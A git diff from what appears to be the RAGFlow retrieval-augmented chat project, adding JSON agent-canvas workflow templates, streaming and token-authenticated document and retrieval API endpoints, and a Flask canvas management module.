"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["retrieval:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}

View File

@ -0,0 +1,88 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "generate:0", "switch:0"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to": "retrieval:0"
},
"others": {
"description": "The question is not about the product usage, appearance and how it works.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to": "message:0"
}
}
}
},
"downstream": ["retrieval:0", "message:0"],
"upstream": ["answer:0"]
},
"message:0": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:0"],
"upstream": ["switch:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["retrieval:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}

View File

@ -0,0 +1,82 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0", "switch:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"],
"empty_response": "Sorry, knowledge base has noting related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "message:0"
}
},
"downstream": ["message:0", "generate:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"message:0": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
]
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}

View File

@ -0,0 +1,103 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["21ca4e6a2c8911ef8b1e0242ac120006"],
"empty_response": "Sorry, knowledge base has noting related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "keyword:0"
}
},
"downstream": ["keyword:0", "generate:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"keyword:0": {
"obj": {
"component_name": "KeywordExtract",
"params": {
"llm_id": "deepseek-chat",
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature": 0.2,
"top_n": 1
}
},
"downstream": ["baidu:0"],
"upstream": ["relevant:0"]
},
"baidu:0": {
"obj":{
"component_name": "Baidu",
"params": {
"top_n": 10
}
},
"downstream": ["generate:1"],
"upstream": ["keyword:0"]
},
"generate:1": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["baidu:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}

View File

@ -0,0 +1,79 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0", "switch:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"],
"empty_response": "Sorry, knowledge base has noting related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0", "rewrite:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "rewrite:0"
}
},
"downstream": ["generate:0", "rewrite:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.02
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"rewrite:0": {
"obj":{
"component_name": "RewriteQuestion",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.8
}
},
"downstream": ["retrieval:0"],
"upstream": ["relevant:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}

View File

@ -25,7 +25,7 @@ from flask_cors import CORS
from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder
from api.utils import CustomJSONEncoder, commands
from flask_session import Session
from flask_login import LoginManager
@ -60,15 +60,21 @@ Session(app)
login_manager = LoginManager()
login_manager.init_app(app)
commands.register_commands(app)
def search_pages_path(pages_dir):
return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
app_path_list.extend(api_path_list)
return app_path_list
def register_page(page_path):
page_name = page_path.stem.rstrip('_app')
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
path = f'{page_path}'
page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))
spec = spec_from_file_location(module_name, page_path)
page = module_from_spec(spec)
@ -76,9 +82,8 @@ def register_page(page_path):
page.manager = Blueprint(page_name, module_name)
sys.modules[module_name] = page
spec.loader.exec_module(page)
page_name = getattr(page, 'page_name', page_name)
url_prefix = f'/{API_VERSION}/{page_name}'
url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'
app.register_blueprint(page.manager, url_prefix=url_prefix)
return url_prefix
@ -86,7 +91,7 @@ def register_page(page_path):
pages_dir = [
Path(__file__).parent,
Path(__file__).parent.parent / 'api' / 'apps',
Path(__file__).parent.parent / 'api' / 'apps', # FIXME: ragflow/api/api/apps, can be remove?
]
client_urls_prefix = [

View File

@ -13,21 +13,25 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import re
from datetime import datetime, timedelta
from flask import request
from flask import request, Response
from flask_login import login_required, current_user
from api.db import FileType, ParserType
from api.db.db_models import APIToken, API4Conversation
from api.db import FileType, ParserType, FileSource
from api.db.db_models import APIToken, API4Conversation, Task, File
from api.db.services import duplicate_name
from api.db.services.api_service import APITokenService, API4ConversationService
from api.db.services.dialog_service import DialogService, chat
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.task_service import queue_tasks, TaskService
from api.db.services.user_service import UserTenantService
from api.settings import RetCode
from api.settings import RetCode, retrievaler
from api.utils import get_uuid, current_timestamp, datetime_format
from api.utils.api_utils import server_error_response, get_data_error_result, get_json_result, validate_request
from itsdangerous import URLSafeTimedSerializer
@ -164,6 +168,7 @@ def completion():
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
if "quote" not in req: req["quote"] = False
msg = []
for m in req["messages"]:
@ -180,13 +185,60 @@ def completion():
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
del req["messages"]
ans = chat(dia, msg, **req)
if not conv.reference:
conv.reference = []
conv.reference.append(ans["reference"])
conv.message.append({"role": "assistant", "content": ans["answer"]})
API4ConversationService.append_message(conv.id, conv.to_dict())
return get_json_result(data=ans)
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
def rename_field(ans):
reference = ans['reference']
if not isinstance(reference, dict):
return
for chunk_i in reference.get('chunks', []):
if 'docnm_kwd' in chunk_i:
chunk_i['doc_name'] = chunk_i['docnm_kwd']
chunk_i.pop('docnm_kwd')
def stream():
nonlocal dia, msg, req, conv
try:
for ans in chat(dia, msg, True, **req):
fillin_conv(ans)
rename_field(ans)
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
API4ConversationService.append_message(conv.id, conv.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
if req.get("stream", True):
resp = Response(stream(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
else:
answer = None
for ans in chat(dia, msg, **req):
answer = ans
fillin_conv(ans)
API4ConversationService.append_message(conv.id, conv.to_dict())
break
rename_field(answer)
return get_json_result(data=answer)
except Exception as e:
return server_error_response(e)
@ -199,7 +251,15 @@ def get(conversation_id):
if not e:
return get_data_error_result(retmsg="Conversation not found!")
return get_json_result(data=conv.to_dict())
conv = conv.to_dict()
for referenct_i in conv['reference']:
if referenct_i is None or len(referenct_i) == 0:
continue
for chunk_i in referenct_i['chunks']:
if 'docnm_kwd' in chunk_i.keys():
chunk_i['doc_name'] = chunk_i['docnm_kwd']
chunk_i.pop('docnm_kwd')
return get_json_result(data=conv)
except Exception as e:
return server_error_response(e)
@ -233,6 +293,13 @@ def upload():
if file.filename == '':
return get_json_result(
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
root_folder = FileService.get_root_folder(tenant_id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, tenant_id)
kb_root_folder = FileService.get_kb_folder(tenant_id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
try:
if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
return get_data_error_result(
@ -264,11 +331,311 @@ def upload():
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
form_data=request.form
if "parser_id" in form_data.keys():
if request.form.get("parser_id").strip() in list(vars(ParserType).values())[1:-3]:
doc["parser_id"] = request.form.get("parser_id").strip()
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
doc = DocumentService.insert(doc)
return get_json_result(data=doc.to_json())
doc_result = DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
return server_error_response(e)
if "run" in form_data.keys():
if request.form.get("run").strip() == "1":
try:
info = {"run": 1, "progress": 0}
info["progress_msg"] = ""
info["chunk_num"] = 0
info["token_num"] = 0
DocumentService.update_by_id(doc["id"], info)
# if str(req["run"]) == TaskStatus.CANCEL.value:
tenant_id = DocumentService.get_tenant_id(doc["id"])
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
#e, doc = DocumentService.get_by_id(doc["id"])
TaskService.filter_delete([Task.doc_id == doc["id"]])
e, doc = DocumentService.get_by_id(doc["id"])
doc = doc.to_dict()
doc["tenant_id"] = tenant_id
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
queue_tasks(doc, bucket, name)
except Exception as e:
return server_error_response(e)
return get_json_result(data=doc_result.to_json())
@manager.route('/list_chunks', methods=['POST'])
# @login_required
def list_chunks():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
try:
if "doc_name" in req.keys():
tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])
elif "doc_id" in req.keys():
tenant_id = DocumentService.get_tenant_id(req['doc_id'])
doc_id = req['doc_id']
else:
return get_json_result(
data=False, retmsg="Can't find doc_name or doc_id"
)
res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
res = [
{
"content": res_item["content_with_weight"],
"doc_name": res_item["docnm_kwd"],
"img_id": res_item["img_id"]
} for res_item in res
]
except Exception as e:
return server_error_response(e)
return get_json_result(data=res)
@manager.route('/list_kb_docs', methods=['POST'])
# @login_required
def list_kb_docs():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
tenant_id = objs[0].tenant_id
kb_name = req.get("kb_name", "").strip()
try:
e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
if not e:
return get_data_error_result(
retmsg="Can't find this knowledgebase!")
kb_id = kb.id
except Exception as e:
return server_error_response(e)
page_number = int(req.get("page", 1))
items_per_page = int(req.get("page_size", 15))
orderby = req.get("orderby", "create_time")
desc = req.get("desc", True)
keywords = req.get("keywords", "")
try:
docs, tol = DocumentService.get_by_kb_id(
kb_id, page_number, items_per_page, orderby, desc, keywords)
docs = [{"doc_id": doc['id'], "doc_name": doc['name']} for doc in docs]
return get_json_result(data={"total": tol, "docs": docs})
except Exception as e:
return server_error_response(e)
@manager.route('/document', methods=['DELETE'])
# @login_required
def document_rm():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
tenant_id = objs[0].tenant_id
req = request.json
doc_ids = []
try:
doc_ids = [DocumentService.get_doc_id_by_doc_name(doc_name) for doc_name in req.get("doc_names", [])]
for doc_id in req.get("doc_ids", []):
if doc_id not in doc_ids:
doc_ids.append(doc_id)
if not doc_ids:
return get_json_result(
data=False, retmsg="Can't find doc_names or doc_ids"
)
except Exception as e:
return server_error_response(e)
root_folder = FileService.get_root_folder(tenant_id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, tenant_id)
errors = ""
for doc_id in doc_ids:
try:
e, doc = DocumentService.get_by_id(doc_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
f2d = File2DocumentService.get_by_document_id(doc_id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc_id)
MINIO.rm(b, n)
except Exception as e:
errors += str(e)
if errors:
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
return get_json_result(data=True)
@manager.route('/completion_aibotk', methods=['POST'])
@validate_request("Authorization", "conversation_id", "word")
def completion_faq():
import base64
req = request.json
token = req["Authorization"]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
if "quote" not in req: req["quote"] = True
msg = []
msg.append({"role": "user", "content": req["word"]})
try:
conv.message.append(msg[-1])
e, dia = DialogService.get_by_id(conv.dialog_id)
if not e:
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
if not conv.reference:
conv.reference = []
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
data_type_picture = {
"type": 3,
"url": "base64 content"
}
data = [
{
"type": 1,
"content": ""
}
]
ans = ""
for a in chat(dia, msg, stream=False, **req):
ans = a
break
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
fillin_conv(ans)
API4ConversationService.append_message(conv.id, conv.to_dict())
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
for chunk_idx in chunk_idxs[:1]:
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
try:
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
response = MINIO.get(bkt, nm)
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
data.append(data_type_picture)
break
except Exception as e:
return server_error_response(e)
response = {"code": 200, "msg": "success", "data": data}
return response
except Exception as e:
return server_error_response(e)
@manager.route('/retrieval', methods=['POST'])
@validate_request("kb_id", "question")
def retrieval():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
kb_id = req.get("kb_id")
doc_ids = req.get("doc_ids", [])
question = req.get("question")
page = int(req.get("page", 1))
size = int(req.get("size", 30))
similarity_threshold = float(req.get("similarity_threshold", 0.2))
vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
top = int(req.get("top_k", 1024))
try:
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
return get_data_error_result(retmsg="Knowledgebase not found!")
embd_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
rerank_mdl = None
if req.get("rerank_id"):
rerank_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
if req.get("keyword", False):
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
question += keyword_extraction(chat_mdl, question)
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
similarity_threshold, vector_similarity_weight, top,
doc_ids, rerank_mdl=rerank_mdl)
for c in ranks["chunks"]:
if "vector" in c:
del c["vector"]
return get_json_result(data=ranks)
except Exception as e:
if str(e).find("not_found") > 0:
return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
retcode=RetCode.DATA_ERROR)
return server_error_response(e)

160
api/apps/canvas_app.py Normal file
View File

@ -0,0 +1,160 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from functools import partial
from flask import request, Response
from flask_login import login_required, current_user
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, server_error_response, validate_request
from agent.canvas import Canvas
@manager.route('/templates', methods=['GET'])
@login_required
def templates():
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
@manager.route('/list', methods=['GET'])
@login_required
def canvas_list():
return get_json_result(data=sorted([c.to_dict() for c in \
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
)
@manager.route('/rm', methods=['POST'])
@validate_request("canvas_ids")
@login_required
def rm():
for i in request.json["canvas_ids"]:
UserCanvasService.delete_by_id(i)
return get_json_result(data=True)
@manager.route('/set', methods=['POST'])
@validate_request("dsl", "title")
@login_required
def save():
req = request.json
req["user_id"] = current_user.id
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
req["dsl"] = json.loads(req["dsl"])
if "id" not in req:
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
return server_error_response(ValueError("Duplicated title."))
req["id"] = get_uuid()
if not UserCanvasService.save(**req):
return server_error_response("Fail to save canvas.")
else:
UserCanvasService.update_by_id(req["id"], req)
return get_json_result(data=req)
@manager.route('/get/<canvas_id>', methods=['GET'])
@login_required
def get(canvas_id):
e, c = UserCanvasService.get_by_id(canvas_id)
if not e:
return server_error_response("canvas not found.")
return get_json_result(data=c.to_dict())
@manager.route('/completion', methods=['POST'])
@validate_request("id")
@login_required
def run():
req = request.json
stream = req.get("stream", True)
e, cvs = UserCanvasService.get_by_id(req["id"])
if not e:
return server_error_response("canvas not found.")
if not isinstance(cvs.dsl, str):
cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
final_ans = {"reference": [], "content": ""}
try:
canvas = Canvas(cvs.dsl, current_user.id)
if "message" in req:
canvas.messages.append({"role": "user", "content": req["message"]})
canvas.add_user_input(req["message"])
answer = canvas.run(stream=stream)
print(canvas)
except Exception as e:
return server_error_response(e)
assert answer is not None, "Nothing. Is it over?"
if stream:
assert isinstance(answer, partial), "Nothing. Is it over?"
def sse():
nonlocal answer, cvs
try:
for ans in answer():
for k in ans.keys():
final_ans[k] = ans[k]
ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
if final_ans.get("reference"):
canvas.reference.append(final_ans["reference"])
cvs.dsl = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
resp = Response(sse(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
final_ans["content"] = "\n".join(answer["content"]) if "content" in answer else ""
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
if final_ans.get("reference"):
canvas.reference.append(final_ans["reference"])
cvs.dsl = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
return get_json_result(data={"answer": final_ans["content"], "reference": final_ans.get("reference", [])})
@manager.route('/reset', methods=['POST'])
@validate_request("id")
@login_required
def reset():
req = request.json
try:
e, user_canvas = UserCanvasService.get_by_id(req["id"])
if not e:
return server_error_response("canvas not found.")
canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
canvas.reset()
req["dsl"] = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
return get_json_result(data=req["dsl"])
except Exception as e:
return server_error_response(e)

View File

@ -14,13 +14,15 @@
# limitations under the License.
#
import datetime
import json
import traceback
from flask import request
from flask_login import login_required, current_user
from elasticsearch_dsl import Q
from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, rag_tokenizer
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
@ -29,7 +31,7 @@ from api.db.services.llm_service import TenantLLMService
from api.db.services.user_service import UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db.services.document_service import DocumentService
from api.settings import RetCode, retrievaler
from api.settings import RetCode, retrievaler, kg_retrievaler
from api.utils.api_utils import get_json_result
import hashlib
import re
@ -38,7 +40,7 @@ import re
@manager.route('/list', methods=['POST'])
@login_required
@validate_request("doc_id")
def list():
def list_chunk():
req = request.json
doc_id = req["doc_id"]
page = int(req.get("page", 1))
@ -61,7 +63,8 @@ def list():
for id in sres.ids:
d = {
"chunk_id": id,
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
id].get(
"content_with_weight", ""),
"doc_id": sres.field[id]["doc_id"],
"docnm_kwd": sres.field[id]["docnm_kwd"],
@ -136,8 +139,11 @@ def set():
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
embd_id = DocumentService.get_embd_id(req["doc_id"])
embd_mdl = TenantLLMService.model_instance(
tenant_id, LLMType.EMBEDDING.value)
tenant_id, LLMType.EMBEDDING.value, embd_id)
e, doc = DocumentService.get_by_id(req["doc_id"])
if not e:
return get_data_error_result(retmsg="Document not found!")
@ -150,7 +156,7 @@ def set():
if len(arr) != 2:
return get_data_error_result(
retmsg="Q&A must be separated by TAB/ENTER key.")
q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
d = beAdoc(d, arr[0], arr[1], not any(
[rag_tokenizer.is_chinese(t) for t in q + a]))
@ -182,13 +188,19 @@ def switch():
@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("chunk_ids")
@validate_request("chunk_ids", "doc_id")
def rm():
req = request.json
try:
if not ELASTICSEARCH.deleteByQuery(
Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
return get_data_error_result(retmsg="Index updating failure")
e, doc = DocumentService.get_by_id(req["doc_id"])
if not e:
return get_data_error_result(retmsg="Document not found!")
